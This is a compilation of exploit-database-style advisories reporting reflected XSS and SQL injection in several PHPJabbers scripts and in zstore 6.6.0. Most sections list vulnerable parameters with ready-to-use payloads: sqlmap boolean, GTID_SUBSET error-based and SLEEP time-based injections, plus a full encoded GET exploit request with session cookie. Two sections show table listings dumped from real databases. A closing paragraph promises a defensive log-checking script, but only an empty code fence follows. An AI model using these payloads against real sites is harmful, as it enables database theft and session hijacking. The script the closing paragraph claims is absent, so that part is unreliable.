<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Car Park Booking System 2.0 - Reflected XSS │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php<br /><br />GET parameter 'index' is vulnerable to XSS<br /><br />/index.php?controller=pjFront&action=pjActionSearch&session_id=c6e6onmv599a10vr76oei88jh2&theme=1&locale=1&hide=0&index=[XSS]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: zstore-6.6.0 - XSS-Reflected<br />## Development: nu11secur1ty<br />## Date: 01.29.2023<br />## Vendor: https://zippy.com.ua/<br />## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4<br />## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4<br /><br />## Description:<br />The value of manual insertion `point 1` is copied into the HTML<br />document as plain text between tags.<br />The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in<br />the manual insertion point 1.<br />This input was echoed unmodified in the application's response.<br /><br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit:<br />```GET<br />GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a<br />HTTP/2<br />Host: store.zippy.com.ua<br />Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main<br />Accept-Encoding: 
gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />```<br /><br />[+] Response:<br />```<br />HTTP/2 200 OK<br />Server: nginx<br />Date: Sun, 29 Jan 2023 07:27:55 GMT<br />Content-Type: text/html; charset=UTF-8<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546<br /><br />Class \App\Pages\Chatgiflc<a<br />href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img<br />src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"><br /> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br><br />```<br /><br /><br />## Proof and Exploit:<br />[href](https://streamable.com/aadj5c)<br /><br />## Reference:<br />[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)<br /><br /><br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Event Ticketing System Script 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /preview.php<br /><br />/preview.php?lid=[XSS]<br /><br />GET parameter 'lid' is vulnerable to XSS<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Travel Tours Script 1.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data and modification │<br />│ of data, and can crash the application or make it unavailable, leading to lost revenue │<br />│ and damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /front.php<br /><br />front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=[SQLI]&rating_to=[SQLI]<br /><br />GET parameter 'rating_from' is vulnerable to SQLI<br /><br />---<br />Parameter: rating_from (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND 3442=3442 AND (7236=7236&rating_to=5<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9974=9974,1))),0x71626b7871),9974) AND (8540=8540&rating_to=5<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2) AND (SELECT 2396 FROM (SELECT(SLEEP(5)))lmil) AND (1063=1063&rating_to=5<br />---<br /><br /><br />GET parameter 'rating_to' is vulnerable to SQLI<br /><br />---<br />Parameter: rating_to (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND 3784=3784 AND (4445=4445<br /><br /> Type: error-based<br /> Title: 
MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT (ELT(9427=9427,1))),0x71626b7871),9427) AND (7794=7794<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&season=1&price_from=60&price_to=1500&rating_from=2&rating_to=5) AND (SELECT 9220 FROM (SELECT(SLEEP(5)))QqcU) AND (6313=6313<br />---<br /><br />[+] Starting the Attack<br /><br />fetching tables for database: '********_****_***'<br />Database: ********_****_***<br />[52 tables]<br />+------------------------------------------+<br />| vacationpackages_comments |<br />| vacationpackages_countries |<br />| vacationpackages_enquiries |<br />| vacationpackages_features |<br />| vacationpackages_fields |<br />| vacationpackages_listings_availabilities |<br />| vacationpackages_listings_features |<br />| vacationpackages_listings |<br />| vacationpackages_multi_lang |<br />| vacationpackages_notifications |<br />| vacationpackages_options |<br />| vacationpackages_payments |<br />| vacationpackages_periods |<br />| vacationpackages_plugin_country |<br />| vacationpackages_plugin_galleries_set |<br />| vacationpackages_plugin_gallery |<br />| vacationpackages_plugin_locale_languages |<br />| vacationpackages_plugin_locale |<br />| vacationpackages_plugin_log_config |<br />| vacationpackages_plugin_log |<br />| vacationpackages_plugin_one_admin |<br />| vacationpackages_plugin_paypal |<br />| vacationpackages_prices |<br />| vacationpackages_roles |<br />| vacationpackages_types |<br />| vacationpackages_users |<br />| vacationpackages_comments |<br />| vacationpackages_countries |<br />| vacationpackages_enquiries |<br />| vacationpackages_features |<br 
/>| vacationpackages_fields |<br />| vacationpackages_listings |<br />| vacationpackages_listings_availabilities |<br />| vacationpackages_listings_features |<br />| vacationpackages_multi_lang |<br />| vacationpackages_notifications |<br />| vacationpackages_options |<br />| vacationpackages_payments |<br />| vacationpackages_periods |<br />| vacationpackages_plugin_country |<br />| vacationpackages_plugin_galleries_set |<br />| vacationpackages_plugin_gallery |<br />| vacationpackages_plugin_locale |<br />| vacationpackages_plugin_locale_languages |<br />| vacationpackages_plugin_log |<br />| vacationpackages_plugin_log_config |<br />| vacationpackages_plugin_one_admin |<br />| vacationpackages_plugin_paypal |<br />| vacationpackages_prices |<br />| vacationpackages_roles |<br />| vacationpackages_types |<br />| vacationpackages_users |<br />+------------------------------------------+<br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Travel Tours Script 1.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /front.php<br /><br />/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&price_from=[XSS]&price_to=[XSS]&rating_from=[XSS]&rating_to=[XSS]<br /><br />/front.php?controller=pjListings&action=pjActionRegister&view=[XSS]&direction=[XSS]&listing_search=[XSS]<br /><br />/front.php?controller=pjListings&action=pjActionListings&listing_search=[XSS]&view=[XSS]&season=[XSS]&pjPage=[XSS]<br /><br /><br />GET parameter 'listing_search' is vulnerable to XSS<br /><br />GET parameter 'view' is vulnerable to XSS<br /><br />GET parameter 'season' is vulnerable to XSS<br /><br />GET parameter 'direction' is vulnerable to XSS<br /><br />GET parameter 'price_from' is vulnerable to XSS<br /><br />GET parameter 'price_to' is vulnerable to XSS<br /><br />GET parameter 'pjPage' is vulnerable to XSS<br /><br />GET parameter 'rating_from' is vulnerable to XSS<br /><br />GET parameter 'rating_to' is vulnerable to XSS<br /><br /><br />URL path is vulnerable to XSS<br /><br />/front.php/[XSS]?controller=pjListings&action=pjActionRegister&view=[XSS]t&direction=[XSS]&listing_search=[XSS]<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Property Listing Script 3.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data and modification │<br />│ of data, and can crash the application or make it unavailable, leading to lost revenue │<br />│ and damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: preview.php<br /><br />/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=[SQLI]&min_bedrooms=[SQLI]&max_bedrooms=[SQLI]&min_bathrooms=[SQLI]&max_bathrooms=[SQLI]&min_floor_area=11&max_floor_area=33<br /><br />GET parameter 'feature_id' is vulnerable to SQLI<br /><br />---<br />Parameter: feature_id (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' RLIKE (SELECT (CASE WHEN (2062=2062) THEN 1 ELSE 0x28 END)) AND 'NbjG'='NbjG&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2733=2733,1))),0x716b707171),2733) AND 'iWla'='iWla&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1' AND (SELECT 3509 FROM (SELECT(SLEEP(5)))pnEw) AND 
'UOAT'='UOAT&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br />---<br /><br />GET parameter 'min_bedrooms' is vulnerable to SQLI<br /><br />---<br />Parameter: min_bedrooms (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) RLIKE (SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0x28 END))-- HIzI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(2095=2095,1))),0x716b707171),2095)-- bfcY&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1) AND (SELECT 9649 FROM (SELECT(SLEEP(5)))cOvl)-- zdSI&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br />---<br /><br />GET parameter 'max_bedrooms' is vulnerable to SQLI<br /><br />---<br />Parameter: max_bedrooms (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) RLIKE (SELECT (CASE WHEN (6630=6630) THEN 
2 ELSE 0x28 END))-- gEsM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(9738=9738,1))),0x716b707171),9738)-- jXwM&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2) AND (SELECT 3446 FROM (SELECT(SLEEP(5)))VCFX)-- cQSs&min_bathrooms=2&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br />---<br /><br />GET parameter 'min_bathrooms' is vulnerable to SQLI<br /><br />---<br />Parameter: min_bathrooms (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) RLIKE (SELECT (CASE WHEN (2227=2227) THEN 2 ELSE 0x28 END))-- lmwd&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(4352=4352,1))),0x716b707171),4352)-- OidJ&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br /><br 
/> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2) AND (SELECT 6082 FROM (SELECT(SLEEP(5)))PGLl)-- mBCY&max_bathrooms=3&min_floor_area=11&max_floor_area=33<br />---<br /><br />GET parameter 'max_bathrooms' is vulnerable to SQLI<br /><br />---<br />Parameter: max_bathrooms (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) RLIKE (SELECT (CASE WHEN (9932=9932) THEN 3 ELSE 0x28 END))-- GPVf&min_floor_area=11&max_floor_area=33<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND GTID_SUBSET(CONCAT(0x717a706b71,(SELECT (ELT(3098=3098,1))),0x716b707171),3098)-- hFHq&min_floor_area=11&max_floor_area=33<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&for=&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=1&max_bedrooms=2&min_bathrooms=2&max_bathrooms=3) AND (SELECT 4637 FROM (SELECT(SLEEP(5)))iqxa)-- IvPE&min_floor_area=11&max_floor_area=33<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching tables for database: '********_****_***'<br />Database: ********_****_***<br />[66 tables]<br 
/>+------------------------------------------+<br />| property_listing_features |<br />| property_listing_fields |<br />| property_listing_multi_lang |<br />| property_listing_options |<br />| property_listing_passwords |<br />| property_listing_payments |<br />| property_listing_periods |<br />| property_listing_plugin_country |<br />| property_listing_plugin_galleries_set |<br />| property_listing_plugin_gallery |<br />| property_listing_plugin_locale_languages |<br />| property_listing_plugin_locale |<br />| property_listing_plugin_log_config |<br />| property_listing_plugin_log |<br />| property_listing_plugin_one_admin |<br />| property_listing_plugin_paypal |<br />| property_listing_plugin_sms |<br />| property_listing_properties_features |<br />| property_listing_properties |<br />| property_listing_roles |<br />| property_listing_types |<br />| property_listing_users |<br />| property_listing_features |<br />| property_listing_fields |<br />| property_listing_multi_lang |<br />| property_listing_options |<br />| property_listing_passwords |<br />| property_listing_payments |<br />| property_listing_periods |<br />| property_listing_plugin_country |<br />| property_listing_plugin_galleries_set |<br />| property_listing_plugin_gallery |<br />| property_listing_plugin_locale_languages |<br />| property_listing_plugin_locale |<br />| property_listing_plugin_log_config |<br />| property_listing_plugin_log |<br />| property_listing_plugin_one_admin |<br />| property_listing_plugin_paypal |<br />| property_listing_plugin_sms |<br />| property_listing_properties_features |<br />| property_listing_properties |<br />| property_listing_roles |<br />| property_listing_types |<br />| property_listing_users |<br />| property_listing_features |<br />| property_listing_fields |<br />| property_listing_multi_lang |<br />| property_listing_options |<br />| property_listing_passwords |<br />| property_listing_payments |<br />| property_listing_periods |<br />| 
property_listing_plugin_country |<br />| property_listing_plugin_galleries_set |<br />| property_listing_plugin_gallery |<br />| property_listing_plugin_locale |<br />| property_listing_plugin_locale_languages |<br />| property_listing_plugin_log |<br />| property_listing_plugin_log_config |<br />| property_listing_plugin_one_admin |<br />| property_listing_plugin_paypal |<br />| property_listing_plugin_sms |<br />| property_listing_properties |<br />| property_listing_properties_features |<br />| property_listing_roles |<br />| property_listing_types |<br />| property_listing_users |<br />+------------------------------------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : PHPJabbers.com │<br />│ Vendor : PHPJabbers │<br />│ Software : PHPJabbers Property Listing Script 3.1 │<br />│ Vuln Type: Reflected XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker can send the victim a link containing a malicious URL in an email or │<br />│ instant message and perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /preview.php<br />Method: GET<br /><br />/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&for=[XSS]&keyword=pent&location=&type_id=3&specials=premium&feature_id=1&min_bedrooms=[XSS]&max_bedrooms=[XSS]&min_bathrooms=[XSS]&max_bathrooms=[XSS]&min_floor_area=11&max_floor_area=33<br /><br /><br />URL parameter 'for' is vulnerable to XSS<br /><br />URL parameter 'min_bedrooms' is vulnerable to XSS<br /><br />URL parameter 'max_bedrooms' is vulnerable to XSS<br /><br />URL parameter 'min_bathrooms' is vulnerable to XSS<br /><br />URL parameter 'max_bathrooms' is vulnerable to XSS<br /><br /><br />[-] Done<br /></code></pre>
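The reflected XSS and SQL injection advisories above each name the injectable script and parameters; this added example (not from any of the advisories, nor from PHPJabbers or zstore) turns that into a defender-side log check: it decodes the query string of each request, restricts attention to the reported paths and parameters, and flags values that carry the payload shapes shown in the sqlmap output (GTID_SUBSET, SLEEP, RLIKE, boolean tails) or HTML/event-handler markers. The log lines, client addresses and values are constructed for the demonstration.

```powershell
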